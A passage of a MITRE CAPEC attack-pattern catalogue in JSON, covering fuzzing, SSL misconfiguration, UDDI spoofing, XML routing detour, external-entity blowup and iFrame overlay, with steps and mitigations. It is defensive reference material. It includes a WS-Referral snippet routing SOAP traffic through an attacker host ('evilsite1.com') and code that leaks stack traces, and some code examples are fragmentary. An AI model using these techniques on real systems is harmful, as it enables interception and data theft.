sensitive data.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes."},"Skills_Required":{"Skill":["General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Gain Privileges","Note":"A successful attack of this kind can compromise the confidentiality of an authorized user\'s credentials."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Depending on the adversary\'s intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad."}]},"Mitigations":{"Mitigation":["Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.","When implementing security features, consider how they can be misused and compromised."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1242"},{"CWE_ID":"1246"},{"CWE_ID":"1281"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"215":{"ID":"215","Name":"Fuzzing for application mapping","Abstraction":"Detailed","Status":"Draft","Description":"An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application\'s log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger\'s desired behavior. In this attack, the purpose of the fuzzing is to observe the application\'s log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. In applications that return a stack trace along with the error, this can enumerate the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"54"},{"Nature":"ChildOf","CAPEC_ID":"28"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Observe communication and inputs] The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.","Technique":["Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.","Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.","Observe inputs using web inspection tools (OWASP\'s WebScarab, Paros, TamperData, TamperIE, etc.)"]},{"Step":"2","Phase":"Experiment","Description":"[Generate fuzzed inputs] Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.","Technique":["Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).","Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system."]},{"Step":"3","Phase":"Experiment","Description":"[Observe the outcome] Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that might provide information to map the application"},{"Step":"4","Phase":"Exploit","Description":"[Craft exploit payloads] An adversary usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the adversary may try changing the origin IP addresses or client browser identification strings or start a new session from where they left off in obfuscating the attack.","Technique":["Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.","If the application rejects the large amount of fuzzing messages from the same host machine, the adversary needs to hide the attacks by changing the IP addresses or other credentials."]}]},"Prerequisites":{"Prerequisite":"The target application must fail to sanitize incoming messages adequately before processing."},"Skills_Required":{"Skill":["Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application\'s log and/or error messages in order to collect information about the target."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"}},"Mitigations":{"Mitigation":["Design: Construct a \'code book\' for error messages. When using a code book, application error messages aren\'t generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value \'coding\' for the error. Such a technique will require helpdesk and hosting personnel to use a \'code book\' or similar mapping to decode application errors/logs in order to respond to them normally.","Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above \'code book\' suggestion.","Implementation: Obfuscate server fields of HTTP response.","Implementation: Hide inner ordering of HTTP response header.","Implementation: Customizing HTTP error codes such as 404 or 500.","Implementation: Hide HTTP response header software information filed.","Implementation: Hide cookie\'s software information filed.","Implementation: Obfuscate database type in Database API\'s error message."]},"Example_Instances":{"Example":[{"p":["The following code generates an error message that leaks the full pathname of the configuration file.","If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application."],"div":["$ConfigDir = \\"/home/myprog/config\\";",{"style":"margin-left:10px;","class":"bad"}]},{"p":["In languages that utilize stack traces, revealing them can give adversaries information that allows them to map functions and file locations for an application. The following Java method prints out a stack trace that exposes the application to this attack pattern.","If this code is running on a server, such as a web application, then the adversary could cause the exception to be printed through fuzzing."],"div":["public void httpGet(HttpServletRequest request, HttpServletResponse response) {",{"style":"margin-left:10px;","class":"bad","div":["try {",{"style":"margin-left:10px;","div":["processRequest();",{"style":"margin-left:10px;"},"ex.printStackTrace(response.getWriter());",{"style":"margin-left:10px;"},"return;",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"209"},{"CWE_ID":"532"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description, Example_Instances, Execution_Flow, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Fuzzing and observing application log data/errors for application mapping",{"Date":"2020-12-17"}]}},"216":{"ID":"216","Name":"Communication Channel Manipulation","Abstraction":"Meta","Status":"Stable","Description":"An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.","Prerequisites":{"Prerequisite":["The target application must leverage an open communications channel.","The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)."]},"Resources_Required":{"Resource":"A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":["Read Data","Modify Data","Other"],"Note":"The adversary\'s injection of additional content into a communication channel negatively impacts the integrity of that channel."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful Communication Channel Manipulation attack can result in sensitive information exposure to the adversary, thereby compromising the communication channel\'s confidentiality."}]},"Mitigations":{"Mitigation":["Encrypt all sensitive communications using properly-configured cryptography.","Design the communication system such that it associates proper authentication/authorization with each channel/message."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Prerequisites"}],"Previous_Entry_Name":["Abuse of Communication Channels",{"Date":"2015-12-07"}]}},"217":{"ID":"217","Name":"Exploiting Incorrectly Configured SSL","Abstraction":"Standard","Status":"Draft","Description":"An adversary takes advantage of incorrectly configured SSL communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.","Likelihood_Of_Attack":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"216"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the configuration levels of either the server or client being targeted, preferably both. This is not a hard requirement, as the attacker can simply assume commonly exploitable configuration settings and indiscriminately attempt them."},{"Step":"2","Phase":"Experiment","Description":"Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one\'s self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94)."},{"Step":"3","Phase":"Exploit","Description":"Insert the malicious data into the stream that takes advantage of the configuration flaw."}]},"Prerequisites":{"Prerequisite":"Access to the client/server stream."},"Skills_Required":{"Skill":["The attacker needs real-time access to network traffic in such a manner that the attacker can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles.",{"Level":"High"}]},"Resources_Required":{"Resource":"The attacker needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":"Usage of configuration settings, such as stream ciphers vs. block ciphers and setting timeouts on SSL sessions to extremely low values lessens the potential impact. Use of later versions of TLS (e.g. TLS 1.1+) can also be effective, but not all clients or servers support the later versions."},"Example_Instances":{"Example":"Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Exploiting Incorrectly Configured SSL Security Levels",{"Date":"2015-12-07"}]}},"218":{"ID":"218","Name":"Spoofing of UDDI/ebXML Messages","Abstraction":"Detailed","Status":"Draft","Description":"An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The targeted business\'s UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit."},"Resources_Required":{"Resource":"The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services."},"Mitigations":{"Mitigation":"Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"345"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"219":{"ID":"219","Name":"XML Routing Detour Attacks","Abstraction":"Standard","Status":"Draft","Description":"An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using command line or an automated tool, an attacker records all instances of web services to process XML requests.","Technique":["Use automated tool to record all instances to process XML requests or find exposed WSDL.","Use tools to crawl WSDL"]},{"Step":"2","Phase":"Experiment","Description":"[Identify SOAP messages that have multiple state processing.] Inspect instance to see whether the XML processing has multiple stages or not.","Technique":"Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not."},{"Step":"3","Phase":"Exploit","Description":"[Launch an XML routing detour attack] The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).","Technique":"The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message"}]},"Prerequisites":{"Prerequisite":"The targeted system must have multiple stages processing of XML content."},"Skills_Required":{"Skill":["To inject a bogus node in the XML routing table",{"Level":"Low"}]},"Resources_Required":{"Resource":"The attacker must be able to insert or compromise a system into the processing path for the transaction."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.","Implementation: Use SSL for connections between all parties with mutual authentication."]},"Example_Instances":{"Example":{"p":["Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a \'end user client\' but rather the starting point of the XML transaction).","Continuing with this example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that they have targeted.","Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents)."],"div":[{"style":"margin-left:10px;","class":"informative","div":["Example SOAP message with routing information in header:",{"style":"color:#32498D; font-weight:bold;"},"<S:Envelope>",{"style":"margin-left:10px;","div":["<S:Header>",{"style":"margin-left:10px;","div":["<m:path xmlns:m=\\"http://schemas.example.com/rp/\\" S:actor=\\"http://schemas.example.com/soap/actor\\" S:mustUnderstand=\\"1\\">",{"style":"margin-left:10px;","div":["<m:action>http://example1.com/</m:action>",{"style":"margin-left:10px;"},"<m:to>http://example4.com/router</m:to>",{"style":"margin-left:10px;"},"<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>",{"style":"margin-left:10px;"},"<m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd>",{"style":"margin-left:10px;"},"<m:rev />",{"style":"margin-left:10px;"}]}]},"<S:Body>",{"style":"margin-left:10px;","div":["...",{"style":"margin-left:10px;"}]}]},"<r:ref xmlns:r=\\"http://schemas.example.com/referral\\">",{"style":"margin-left:10px;","div":["<r:for>",{"style":"margin-left:10px;","div":["<r:prefix>http://example2.com/router</r:prefix>",{"style":"margin-left:10px;"}]},"<r:if/>",{"style":"margin-left:10px;"},"<r:go>",{"style":"margin-left:10px;","div":["<r:via>http://example3.com/router</r:via>",{"style":"margin-left:10px;"}]}]}],"p":"Add an additional node (example3.com/router) to the XML path in a WS-Referral message"},{"style":"margin-left:10px;","class":"result","div":["Resulting in the following SOAP Header:",{"style":"color:#32498D; font-weight:bold;"},"<S:Envelope>",{"style":"margin-left:10px;","div":["<S:Header>",{"style":"margin-left:10px;","div":["<m:path xmlns:m=\\"http://schemas.example.com/rp/\\" S:actor=\\"http://schemas.example.com/soap/actor\\" S:mustUnderstand=\\"1\\">",{"style":"margin-left:10px;","div":["<m:action>http://example1.com/</m:action>",{"style":"margin-left:10px;"},"<m:to>http://example4.com/router</m:to>",{"style":"margin-left:10px;"},"<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>",{"style":"margin-left:10px;"},"<m:fwd>",{"style":"margin-left:10px;","div":["<m:via>http://example2.com/router</m:via>",{"style":"margin-left:10px;"},"<m:via>http://example3.com/router</m:via>",{"style":"margin-left:10px;"}]},"<m:rev />",{"style":"margin-left:10px;"}]}]},"<S:Body>",{"style":"margin-left:10px;","div":["...",{"style":"margin-left:10px;"}]}]}]},{"style":"margin-left:10px;","class":"attack","div":["Example of WS-Referral based WS-Routing injection of the bogus node route:",{"style":"color:#32498D; font-weight:bold;"},"<r:ref xmlns:r=\\"http://schemas.example.com/referral\\">",{"style":"margin-left:10px;","div":["<r:for>",{"style":"margin-left:10px;","div":["<r:prefix>http://example2.com/router</r:prefix>",{"style":"margin-left:10px;"}]},"<r:if/>",{"style":"margin-left:10px;"},"<r:go>",{"style":"margin-left:10px;","div":["<r:via>http://evilsite1.com/router</r:via>",{"style":"margin-left:10px;"}]}]}]},{"style":"margin-left:10px;","class":"result","div":["Resulting XML Routing Detour attack:",{"style":"color:#32498D; font-weight:bold;"},"<S:Envelope>",{"style":"margin-left:10px;","div":["<S:Header>",{"style":"margin-left:10px;","div":["<m:path xmlns:m=\\"http://schemas.example.com/rp/\\" S:actor=\\"http://schemas.example.com/soap/actor\\" S:mustUnderstand=\\"1\\">",{"style":"margin-left:10px;","div":["<m:action>http://example_0.com/</m:action>",{"style":"margin-left:10px;"},"<m:to>http://example_4.com/router</m:to>",{"style":"margin-left:10px;"},"<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>",{"style":"margin-left:10px;"},"<m:fwd>",{"style":"margin-left:10px;","div":["<m:via>http://example2.com/router</m:via>",{"style":"margin-left:10px;"},"<m:via>http://evilesite1.com/router</m:via>",{"style":"margin-left:10px;"},"<m:via>http://example3.com/router</m:via>",{"style":"margin-left:10px;"}]},"<m:rev />",{"style":"margin-left:10px;"}]}]},"<S:Body>",{"style":"margin-left:10px;","div":["...",{"style":"margin-left:10px;"}]}]}]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"441"},{"CWE_ID":"610"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"32","Entry_Name":"Routing Detour"},{"Taxonomy_Name":"WASC","Entry_ID":"44","Entry_Name":"XML Entity Expansion"}]},"References":{"Reference":[{"External_Reference_ID":"REF-80","Section":"WASC-32 - Routing Detour"},{"External_Reference_ID":"REF-81"},{"External_Reference_ID":"REF-65"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Example_Instances"}]}},"220":{"ID":"220","Name":"Client-Server Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions. For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Prerequisites":{"Prerequisite":"The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction."},"Resources_Required":{"Resource":"The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"757"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"221":{"ID":"221","Name":"Data Serialization External Entities Blowup","Abstraction":"Detailed","Status":"Draft","Description":"This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"ChildOf","CAPEC_ID":"278"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target web service] The adversary must first find a web service that takes input data in the form of a serialized language such as XML or YAML."},{"Step":"2","Phase":"Experiment","Description":"[Host malicious file on a server] The adversary will create a web server that contains a malicious file. This file will be extremely large, so that if a web service were to try to load it, the service would most likely hang."},{"Step":"2","Phase":"Experiment","Description":"[Craft malicious data] Using the serialization language that the web service takes as input, the adversary will craft data that links to the malicious file using an external entity reference to the URL of the file."},{"Step":"4","Phase":"Exploit","Description":"[Send serialized data containing URI] The adversary will send specially crafted serialized data to the web service. When the web service loads the input, it will attempt to download the malicious file. Depending on the amount of memory the web service has, this could either crash the service or cause it to hang, resulting in a Denial of Service attack."}]},"Prerequisites":{"Prerequisite":"A server that has an implementation that accepts entities containing URI values."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.","This attack may be mitigated by tweaking the serialized data parser to not resolve external entities. If external entities are needed, then implement a custom resolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally."]},"Example_Instances":{"Example":{"p":"In this example, the XML parser parses the attacker\'s XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.","div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"611"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"43","Entry_Name":"XML External Entities"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Consequences, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["XML External Entities",{"Date":"2018-07-31"},"XML External Entities Blowup",{"Date":"2020-07-30"}]}},"222":{"ID":"222","Name":"iFrame Overlay","Abstraction":"Detailed","Status":"Draft","Description":"In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers\' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"103","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Craft an iFrame Overlay page] The attacker crafts a malicious iFrame overlay page.","Technique":"The attacker leverages iFrame overlay capabilities to craft a malicious iFrame overlay page."},{"Step":"2","Phase":"Exploit","Description":"[Attacker tricks victim to load the iFrame overlay page] Attacker utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.","Technique":["Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.","Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.","Trick the victim to the malicious site through a cross-site scripting attack."]},{"Step":"3","Phase":"Exploit","Description":"[Trick victim into interacting with the iFrame overlay page in the desired manner] The attacker tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim\'s level of privilege.","Technique":["Hide action controls over very commonly used functionality.","Hide action controls over very psychologically tempting content."]}]},"Prerequisites":{"Prerequisite":"The victim is communicating with the target application via a web based UI and not a thick client. The victim\'s browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system\'s interaction window is open in the victim\'s browser and supports the ability for initiating sensitive actions on behalf of the user in the target system."},"Skills_Required":{"Skill":["Crafting the proper malicious site and luring the victim to this site is not a trivial task.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain 